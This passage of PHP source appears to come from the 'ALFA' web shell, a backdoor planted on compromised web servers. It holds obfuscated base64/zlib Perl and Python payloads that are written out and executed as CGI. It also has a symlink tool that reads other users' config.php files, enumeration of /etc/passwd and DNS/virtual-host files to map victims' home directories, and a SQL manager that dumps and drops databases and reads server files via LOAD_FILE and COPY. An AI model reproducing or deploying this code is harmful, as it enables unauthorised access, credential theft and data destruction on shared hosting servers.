jxWCv/dAzbo2kBeOIVKCqWxyxTqHdHL4govjHcdwfyYg2FTWEJ2RDwR0edHTGUeyIXC6nxMyhPzXIoauifwuPh3M/R34ZOlNVFu/rtaNOYG1r0nA0lPLt7dL73bpK4haqsmMgaxQx4KH/hRkOYX0Jp5wHdtC5r0EM22UFRVOmWBGoKXuaMReECUZtBO9VawBR/CukEr2QmjzbsKaUg4oCEg1l9aWAlS8d6XummVBRbkuJNSdc8Vz9y6XOS6UNk9z8H/CwS85PBMbe6WcAOUMHqjEm4raRsPO44LPcOKqVMmuU1qwysR3hHjasr7Wcq/m9JpZNZcndd7T3KKNGu/dmnSv1EXa8fEQIVIWRbAjj0vZ5aZqWZ62nN6+1dtKsSp+BVcrx4xdV1zV7hGLqcNeIFwBwaq2RnBLWddTXQTQUVFkhShXWrSq3GLRelXT75q+WRbMEEdX4yKbpaSp+74aK/TI0PYQnvFMVmQ90/zPuv3yQSnbWCnfySBiTwOXVfIL9KCfgm4ucGVxg5fWS0xXUOsaC2n/UQbxE01kkAEiRZbwiL2KoPXmOjjFXCIP9R7XpkeflOPjg3qlMw6CQhLu/kBT13m5/x1mPmRYsLINtHKDkoGvPWnVOdoCjbkOCV13XAVaKPkAixRcc2csUbzRzQ0qv9QqWB3Z0UDl1qmoKbVkFN4bTESvCgM1zAgQGe7CGNB48utZTCwL5nFuyTP7YvvS1iopwmqtuga9HVzaYm6RugaaHPxQNREqQ4itf6lM/FYyFXtlmX8G7NUN/DWEfer4vsQXdDYDhjVGdQvqzCutRS9al6iDdjyvtI/GrYYL1e52a5PYWs1i0C6lSqTktHMJnVpYcVdIVzoTb3SmiJFKFOuWymsdEXouE/giMCQWEQPlPT2Ul72ysWzL4lQPeih5EPLRnYhv1QIc1+KbaKtEjwWzcE5LBbOlUBu+Fnjg3AyatSD2Kth5VAGDHPehJXALgGXDGSZQzLsI3mM+kdazUVPNFtXIARgwxzBeyPMt5IEvKmRbGKc6fnAqFSzvHNYAaEpHYgf0qBJEzr9WYyGOVFvC8k3A3YtXrwJtZz/IZ2xi1WiAHqLr6sKwDU65JVXF0waCOnUeEw0CcrNwfriB2AOhABs4lA3EVQUSfkUnEUPhenoF/dWqz6AgpLe7s6PHO1/Gy3N1G4S73pm4DZ7J2+BJeRscpKe5uPIy+ETogjJ0nCVJdg31+gMQZIP0nRw+smIpAeSVUuM6OVx6BmmfkHO4iKt7eJ5A+0D5JBd/20hAJAheSF3QAfYPnBIY9H8BXEf6SM2TsABv9EDFO1O3M+E4iihj5TUcwne0ltrrSUFQ0NDqGvX41C6D9Fl1J9w0WUHaq0ncKhuKLqbl13JYkylSXlcrL2onyv9SgA//A3Qr5vcvEQAA")));';
	$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
	$cginame = "symperl.alfa";
	$source = $perl;
	$lang = "perl";
	if($_POST["alfa2"]=="sympy"){
		$cginame = "pysymlink.alfa";
		$source = $py;
		$lang = "python";
	}
	@__write_file($cginame,$source);
	@chmod($cginame,0755);
	echo __pre();
	$resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
	if(strlen($resource) == 0){
		echo AlfaiFrameCreator('cgialfa/'.$cginame);
	}else{
		echo $resource;
	}
}
if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
AlfaNum(9,10);
echo __pre().'
<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
<p><input type="submit" value=" " name="symlink" /></p></form></center>';
$path = $_POST['alfa5'];
$symname = $_POST['alfa6'];
$solevisible58 = $_POST['alfa7'];
if($solevisible58){
$new_name = str_replace(".", "_", basename($symname));
$rand_dir = $new_name.rand(111,9999);
$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
@mkdir($sym_dir, 0777, true);
alfacgihtaccess('sym', $sym_dir, $symname);
_alfa_symlink("$path","$sym_dir/$symname");
echo __pre();
echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
}
}else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
}
if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
$cant_symlink = true;
if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
@mkdir('alfasymlink',0777);
alfacgihtaccess('sym','alfasymlink/');
_alfa_symlink('/','alfasymlink/root');
$table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
echo "<center>";
$lines = array();
$anony_domains = array();
$anonymous_users = array();
$f_black = array();
$error = false;
$anonymous = false;
$makepwd = "/home/{user}/public_html/";
$domains = alfaGetDomains();
$lines = $domains["lines"];
$state = $domains["state"];
$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
$can_runcmd = _alfa_can_runCommand(false,false);
if(!$is_posix && !$can_runcmd){
	$anonymous = true;
	$anony_domains = $domains["lines"];
	$lines = _alfa_file('/etc/passwd');
}
echo $table_header;
$count=1;
$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
foreach($lines as $line){
	$domain = "";
	$owner = "";
	if($anonymous){
		$explode = explode(":", $line);
		$owner = $explode[0];
		$owner_len = strlen($owner) - 1;
		$userid = $explode[2];
		if((int)$userid < 500)continue;
		$domain = "[?????]";
		$temp_black = array();
		$finded = false;
		foreach($anony_domains as $anony){
			if($state == "named.conf"){
				if(@strstr($anony, 'zone')){
					preg_match_all('#zone "(.*)"#',$anony, $data);
					$domain = $data[1][0];
				}else{
					continue;
				}
			}elseif($state == "named" || $state == "valiases"){
				if($anony == "." || $anony == "..")continue;
				if($state == "named")$anony = rtrim($anony, ".db");
				$domain = $anony;
			}
			$sub_domain = str_replace(array("-","."), "", $domain);
			if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
				if(in_array($owner.$domain, $temp_black))continue;
				$sympath = str_replace("{user}", $owner, $makepwd);
				$http = "http://".$domain;
				echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
				$count++;
				$temp_black[] = $owner.$domain;
				$finded = true;
			}
		}
		if(!$finded){
			$anonymous_users[] = $owner;
		}
	}else{
 		if($state == "named.conf"){
			if(@strstr($line, 'zone')){
				preg_match_all('#zone "(.*)"#',$line, $data);
				$domain = $data[1][0];
			}else{
				continue;
			}
		}elseif($state == "named" || $state == "valiases"){
			if($line == "." || $line == "..")continue;
			if($state == "named")$line = rtrim($line, ".db");
			$domain = $line;
		}
		if(strlen(trim($domain)) > 2 && $state != "passwd"){
			if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
			if($is_posix){
				$user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
				$owner = $user["name"];
			}elseif($can_runcmd){
				$owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
			}
		}
	}
	if(!$anonymous){
		if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
		$sympath = str_replace("{user}", $owner, $makepwd);
		$http = "http://".$domain;
		if($state == "passwd"){
			$http = "javascript:alert('we cant find domain...')";
		}
		echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
		$count++;
		$f_black[] = $owner.$domain;
	}
}
if($anonymous){
	foreach($anonymous_users as $owner){
		$sympath = str_replace("{user}", $owner, $makepwd);
		$http = "javascript:alert('we cant find domain...')";
		echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
		$count++;
	}
}
$cant_symlink = false;
}else{
$is_direct = false;
$makepwd = alfaMakePwd();
if(_alfa_file_exists("/etc/virtual/domainowners")){
	$makepwd = "/home/{user}/public_html";
	$is_direct = true;
}
$sole = _alfa_file("/etc/virtual/domainowners");
$count=1;
echo $table_header;
$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
if($sole){
	foreach($sole as $visible){
		if(@strstr($visible,":")){
			$solevisible = explode(':', $visible);
			$cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
			echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
		}
	}
}else{
	$passwd = _alfa_file("/etc/passwd");
	if($passwd){
		$html = "";
		$is_named = false;
		$users = array();
		$domains = array();
		$uknowns = array();
		foreach($passwd as $user){
			$user = trim($user);
			$expl = explode(":", $user);
			if((int)$expl[2] < 500)continue;
			$users[$expl[0]] = $expl[5];
		}
		$site_domains = @scandir("/etc/virtual/");
		if(!$site_domains){
			$site_domains = alfaEx("ls /etc/virtual/");
			$site_domains = explode("\n", $site_domains);
			if(!$site_domains){
				$site_domains = _alfa_file("/etc/named.conf");
				if($site_domains){$is_named = true;}
			}
		}
		foreach($site_domains as $line){
			if($is_named){
				if(@strstr($line, 'zone')){
					preg_match_all('#zone "(.*)"#',$line, $data);
					$domain = $data[1][0];
					if(strlen($domain  > 2) && !empty($domain)){
						$domains[] = $domain;
					}
				}
			}else{
				$domains[] = $line;
			}
		}
		$x = 1;
		foreach($users as $user => $home){
			foreach($domains as $domain){
				$user_len = strlen($user) - 1;
				$sub_domain = str_replace(array("-","."), "", $domain);
				$five_user = substr($user, 0,$user_len);
				$five_domain = substr($sub_domain, 0,$user_len);
				if($five_user == $five_domain){
					if($is_direct){
						$cwd = str_replace("{user}", $user, $makepwd);
					}else{
						$expl = explode("}/", $makepwd);
						$cwd = $home."/".$expl[1];
					}
					$html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
				}else{
					$uknowns[$user] = $home;
				}
			}
		}
		$uknowns = array_unique($uknowns);
		foreach($uknowns as $user => $home){
			if($is_direct){
				$cwd = str_replace("{user}", $user, $makepwd);
			}else{
				$expl = explode("}/", $makepwd);
				$cwd = $home."/".$expl[1];
			}
			$html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
		}
		echo($html);
	}
}
echo "</table>";
$cant_symlink = false;
}
}else{
	echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
	$cant_symlink = false;
}
if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
echo "</center></table>";
}
echo "</div>";
alfafooter();
}
function alfasql(){
if(!isset($_POST['sql_host'])){
$_POST['sql_host'] = $_SESSION["sql_host"];
$_POST['sql_login'] = $_SESSION["sql_login"];
$_POST['sql_pass'] = $_SESSION["sql_pass"];
$_POST['sql_base'] = $_SESSION["sql_base"];
}
class DbClass{
public $type;
public $link;
public $res;
function __construct($type){
$this->type = $type;
}
function connect($host, $user, $pass, $dbname){
switch($this->type){
case 'mysql':
if($this->link = @mysqli_connect($host,$user,$pass,$dbname)) return true;
break;
case 'pgsql':
$host = explode(':', $host);
if(!$host[1]) $host[1]=5432;
if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
break;
}
return false;
}
function selectdb($db){
switch($this->type){
case 'mysql':
if(@mysqli_select_db($db))return true;
break;
}
return false;
}
function query($str){
switch($this->type){
case 'mysql':
return $this->res = @mysqli_query($this->link,$str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}
function fetch(){
$res = func_num_args()?func_get_arg(0):$this->res;
switch($this->type){
case 'mysql':
return @mysqli_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs(){
switch($this->type){
case 'mysql':
return $this->query("SHOW databases");
break;
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;
}
return false;
}
function listTables(){
switch($this->type){
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
break;
}
return false;
}
function error(){
switch($this->type){
case 'mysql':
return @mysqli_error($this->link);
break;
case 'pgsql':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str){
switch($this->type){
case 'mysql':
if(function_exists('mysql_set_charset'))
return @mysqli_set_charset($this->link,$str);
else
$this->query('SET CHARSET '.$str);
break;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str){
switch($this->type){
case 'mysql':
return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
break;
case 'pgsql':
$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
$r=array();
while($i=$this->fetch())
$r[] = $i['file'];
$this->query('drop table solevisible');
return array('file'=>implode("\n",$r));
break;
}
return false;
}
function dump($table, $fp = false){
switch($this->type){
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
$create = mysqli_fetch_array($res);
$sql = $create[1].";\n";
if($fp) fwrite($fp, $sql); else echo($sql);
$this->query('SELECT * FROM `'.$table.'`');
$head = true;
while($item = $this->fetch()){
$columns = array();
foreach($item as $k=>$v) {
if($v == null)
$item[$k] = "''";
elseif(is_numeric($v))
$item[$k] = $v;
else
$item[$k] = "'".@mysqli_real_escape_string($this->link, $v)."'";
$columns[] = "`".$k."`";
}
if($head) {
$sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
$head = false;
} else
$sql = "\n\t,(".implode(", ", $item).')';
if($fp) fwrite($fp, $sql); else echo($sql);
}
if(!$head)
if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
break;
case 'pgsql':
$this->query('SELECT * FROM '.$table);
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = "'".addslashes($v)."'";
$columns[] = $k;
}
$sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
if($fp) fwrite($fp, $sql); else echo($sql);
}
break;
}
return false;
}
};
$db = new DbClass($_POST['type']);
if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
switch($_POST['charset']){
case "Windows-1251": $db->setCharset('calfa1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "calfa866": $db->setCharset('calfa866'); break;
}
$json = json_decode($_POST['alfa2'],true);
if(count($json['tbl'])>0){
if($_POST['alfa1']=='dumpfile'){
if($fp = @fopen($json['file'],'w')){
foreach($json['tbl'] as $v)$db->dump($v, $fp);
fclose($fp);
$dumpStatus = true;
}}else{
foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v);
}
}
unset($_POST['alfa2']);
}
alfahead();
echo "
<div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center>
<form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>
<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
<input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'UTF-8') ."'>
<td><select name='type'><option value='mysql' ";
if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
<td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
<td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
$tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
if(isset($_POST['sql_host'])){
if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
$_SESSION["sql_host"] = $_POST['sql_host'];
$_SESSION["sql_login"] = $_POST['sql_login'];
$_SESSION["sql_pass"] = $_POST['sql_pass'];
$_SESSION["sql_base"] = $_POST['sql_base'];
switch($_POST['charset']){
case "Windows-1251": $db->setCharset('calfa1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "calfa866": $db->setCharset('calfa866'); break;
}
$db->setCharset('utf8');
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while($item = $db->fetch()) {
list($key, $value) = each($item);
echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
}
echo '</select>';
}
else echo $tmp;
}else
echo $tmp;
echo "</td>
<td><input type='submit' value=' '></td>
<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
</tr>
</table>
<script>mysql_cache['host']='".addslashes($_POST['sql_host'])."';mysql_cache['user']='".addslashes($_POST['sql_login'])."';mysql_cache['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['db']='".addslashes($_POST['sql_base'])."';mysql_cache['charset']='".addslashes($_POST['charset'])."';mysql_cache['type']='".addslashes($_POST['type'])."';mysql_cache['count']='".addslashes($_POST['sql_count'])."'</script>
";
if(isset($db) && $db->link){
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if(!empty($_POST['sql_base'])){
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;'><div class='txtfont'>Tables:</div><br><br>";
$tbls_res = $db->listTables();
while($item = $db->fetch($tbls_res)){
list($key, $value) = each($item);
if(!empty($_POST['sql_count']))
$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href='javascript:void(0);' onclick=\"fs('0','".$value."')\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</nobr><br>";
}
echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4');\" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');\" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>".($dumpStatus?'<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>':'')."</td><td style='border-top:2px solid #666;'>";
if(@$_POST['alfa1'] == 'select'){
$_POST['alfa1'] = 'query';
$_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
$db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`');
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo "<span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
echo " of $pages";
if($_POST['alfa3'] > 1)
echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']-1)."\"]')>&lt; Prev</a>";
if($_POST['alfa3'] < $pages)
echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']+1)."\"]')>Next &gt;</a>";
$_POST['alfa3']--;
$cache_table = $_POST['alfa2'];
if($_POST['type']=='pgsql')
$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30);
else
$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
echo "<br><br>";
}
if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) {
$prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'"));
$db->query(@$_POST['alfa2']);
if($db->res !== false){
$title = false;
echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
$line = 1;
while($item = $db->fetch()) {
if(!$title){
echo '<tr><th>#</th>';
foreach($item as $key => $value){
echo '<th>'.$key.'</th>';
}
reset($item);
$title=true;
echo '</tr><tr>';
$line = 2;
}
if($cache_table!=''){
	$cacheMsg = '<a href="javascript:void(0);" onclick=fs(\'2\',\'["'.$cache_table.'","'.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).'","'.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).'"]\')>Edit</a>';
}else{
	$cacheMsg ='-';
}
echo '<tr class="l'.$line.'"><td>'.$cacheMsg.'</td>';
$line = $line==1?2:1;
foreach($item as $key => $value){
if($value == null)
echo '<td><i>null</i></td>';
else
echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
}
echo '</tr>';
}
echo '</table>';
} else {
echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
}
}
echo('</form>');
if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){
$data = explode(':',$_POST['alfa3']);
echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data[0].'</font></p>');
echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
if($data[1] != '0'){
$data[2] = __ZGVjb2Rlcg($data[2]);
$data[2] = str_replace('"','',$data[2]);
$fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'"));
$fetch['__ALFAKEY'] = $data[1];
$fetch['__ALFAKEYVAL'] = $data[2];
}else{
$d = __ZGVjb2Rlcg($data[2]);
$fetch = json_decode($d, true);
}
foreach($fetch as $key => $value){
if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue;
$value = htmlspecialchars($value);
echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
}
echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode(($data[1] != '0'?array('__ALFAKEY'=>$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
}
